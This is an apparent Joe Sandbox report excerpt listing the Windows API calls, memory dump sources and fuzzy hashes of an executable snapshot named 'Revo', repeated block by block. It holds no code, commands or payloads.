• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: 1c769ba05c80f99646182a67dd2a9d7b609c2e0eeef89cc1e8ace76a876f498b
• Instruction ID: 1ca5a891072309ee4d57d6c386aa99eedf8583e79045272cabd10b8210a2a1fd
• Opcode Fuzzy Hash: 1c769ba05c80f99646182a67dd2a9d7b609c2e0eeef89cc1e8ace76a876f498b
• Instruction Fuzzy Hash: 3311C171904206EADF15DFA0DA585AE7774FF04348F20443FE802B62D0D3B84A41DB5D
APIs
  • Part of subcall function 00405CC8: ShellExecuteExW.SHELL32(?), ref: 00405CD7
  • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
  • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
Strings
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
• String ID: @
• API String ID: 165873841-2766056989
• Opcode ID: e742f24370eeb6c79a6e3be1c19ad95986f761f1fedb39cce3e5cc15d6c6f8bb
• Instruction ID: fada87d5783261b67c1888f8bede04a63cf771d19a625931ff974fd18e721819
• Opcode Fuzzy Hash: e742f24370eeb6c79a6e3be1c19ad95986f761f1fedb39cce3e5cc15d6c6f8bb
• Instruction Fuzzy Hash: E0112B71E142198ADB10EFB9CA4AB8DB7F0AF04308F20457FE545F72D2DBB889449B18
                                                                                                                                                                            APIs
                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                            • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                                                            • Instruction ID: 79785e1055596f35c81cc11ac1c08ebc052ec65b95c8641ce566291046e0593e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                                                            • Instruction Fuzzy Hash: C10144316202109BEB091B799D04B2B3398E750754F20427FF841F32F0E6B8CC028B4E
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040580A
                                                                                                                                                                              • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 00405856
Similarity
• API ID: InitializeMessageSendUninitialize
• String ID:
• API String ID: 2896919175-0
• Opcode ID: 691039c818a67b31f98599bc9a66305e369ba1548cb07ccd7a3140e409cbdcf5
• Instruction ID: 75974562a342b4767595fe941f1b5a5caa8115d748db5a0a183e84b8e7df0fb7
• Opcode Fuzzy Hash: 691039c818a67b31f98599bc9a66305e369ba1548cb07ccd7a3140e409cbdcf5
• Instruction Fuzzy Hash: 71F090739015008AE74177A5AD01B2677A4EB98709F06847AEFC4B22B0E7B948118E5E
APIs
• CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
• GetLastError.KERNEL32 ref: 00405C46
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
• Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
• Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
• Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401F21
• EnableWindow.USER32(00000000,00000000), ref: 00401F2C
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: d0188487546d0aa2d07df64ecb57d90e690e89e3614f878a6311feaccaca8818
• Instruction ID: ce97bb54dc56410027eb81a7581dc46f0de68bed8411b1f66f85bdadb8ab3b17
• Opcode Fuzzy Hash: d0188487546d0aa2d07df64ecb57d90e690e89e3614f878a6311feaccaca8818
• Instruction Fuzzy Hash: 7DE04876908610DFE744EBA4AE495AE73B4EF84365710097FE041F11D1D7B94D00965D
APIs
• DispatchMessageW.USER32(?), ref: 00406AE9
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00406AF9
Similarity
• API ID: Message$DispatchPeek
• String ID:
• API String ID: 1770753511-0
• Opcode ID: 454023410e24b941cb85301e3ae29d468fd74800f29e5bcbc5c5f96efbc0212a
• Instruction ID: 1ddfa30a50b64daf61bbb77bbc73644e1ad8712fad2235fac67661dc563a41bf
• Opcode Fuzzy Hash: 454023410e24b941cb85301e3ae29d468fd74800f29e5bcbc5c5f96efbc0212a
• Instruction Fuzzy Hash: 8CE08673A01119A7CE00B6A99D05ECB777C9B95750F014036FA01F3084E674E5028AB8
APIs
• CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
• CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                            • Opcode ID: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                                                            • Instruction ID: 678fb2cce29b027916b6e9c77d741f72fc3b9667aac1924bad6fa13dfa27649e
                                                                                                                                                                            • Opcode Fuzzy Hash: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                                                            • Instruction Fuzzy Hash: E6E0BFB4500209BFFB009B64ED49F7B7B7CE704605F008525BD10F2191D774D8159A7D
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                                                              • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                                              • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                                                                                                                                              • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                            • Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                                                            • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                                                            • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,74DF3420,00000000,74DF2EE0,00403CB6,004D1000,00403BB5,?,?,00000008,0000000A,0000000C), ref: 00403CF9
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403D00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1100898210-0
                                                                                                                                                                            • Opcode ID: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                                                            • Instruction ID: 6cc7235c82e409e594193dc40a4abc0356c386f753d5776fe34d96f63476a0b8
                                                                                                                                                                            • Opcode Fuzzy Hash: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE012334151305BD6225F59FE0575ABB68BF45F22F05C52FE940BB2A18BB85C424FD8
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                            • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                            • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                                                                                                                            • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                            • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                            • Instruction ID: 83b49fe15d4d51a1c27b4b8da2ab4689423c6710ab607d501633f61f971848cf
                                                                                                                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                            • Instruction Fuzzy Hash: 63D0C972504220BFC2102728AE0889BBB55DB552717028A35FCA9A22B0CB314C6A86A4
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
• Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
• Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
• Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
APIs
• CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
• CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
• Instruction ID: 93454ec2f84d486dd0eb46c633a3a61ffb1fb8fcaaff07e214acfe86ea83ea04
• Opcode Fuzzy Hash: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
• Instruction Fuzzy Hash: 33E0863150471496D5206F7CAE4D9853B185F41335765C327F038F21F0C738D95A5AAD
APIs
• MoveFileW.KERNEL32(00000000,00000000), ref: 004016BB
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileMove
• String ID:
• API String ID: 3562171763-0
• Opcode ID: 68bb4f6f7371558e69e9210aa95fbfffb87ec2be4bc2e048b920f3dfebe64502
• Instruction ID: 51a81b0a5d784a3e000b48fd00e23250cd6aa6ca0aeb3385d4825347e3700de9
• Opcode Fuzzy Hash: 68bb4f6f7371558e69e9210aa95fbfffb87ec2be4bc2e048b920f3dfebe64502
• Instruction Fuzzy Hash: A9F09031608112A3CB10B7B55F0ED9F26949F8136CB30463FB112B21E1D6BC8A02966E
APIs
• SetFilePointer.KERNEL32(00000000,?,00000000,?,?), ref: 004028D4
  • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FilePointerwsprintf
• String ID:
• API String ID: 327478801-0
• Opcode ID: 87c5897e7d26168ae8e73bcafa5ed0f6671dd4abe8b22ba1c793c606c7386a0e
• Instruction ID: 6ed73ee8f3319f68a8da4c27dc8c9ca591426a2e8a32d0aa126581893dcb710c
• Opcode Fuzzy Hash: 87c5897e7d26168ae8e73bcafa5ed0f6671dd4abe8b22ba1c793c606c7386a0e
• Instruction Fuzzy Hash: A4E06D71908104AAEB04ABA5AE59CAE7379AF94345B20443FF101F00E8C6B94D109A2D
APIs
• FindNextFileW.KERNEL32(00000000,?,?), ref: 00402917
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: FileFindNext
• String ID:
• API String ID: 2029273394-0
• Opcode ID: 742a5d2d02c8cd350c2a3ef58f522920eb87d0a7cd3bfa896a74a5719c09783c
• Instruction ID: d46dfd92da6d3320027a158c46672eb634da6cf54ac1c691db46aaaef4df00ea
• Opcode Fuzzy Hash: 742a5d2d02c8cd350c2a3ef58f522920eb87d0a7cd3bfa896a74a5719c09783c
• Instruction Fuzzy Hash: E5E06D72A04105DBDB11DBE5DAAC9AFB3B8EF00348F20447BD102F21E1E7B98A549B19
APIs
• RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406566
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
• Instruction ID: cfc89692b4771faa31f3440cbcbb3328f2b21d62788620711c29387ee39994bc
• Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
• Instruction Fuzzy Hash: 94E0BFB2010109BEEF095F50EC0AD7F371DE708210F11452EF946D5051E6B5A9309674
APIs
• WriteFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,00420DE6,0041E6F0,0040359E,0041E6F0,00420DE6,004266F0,00004000,?,00000000,004033C8,00000004), ref: 00406258
Memory Dump Source
• Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp
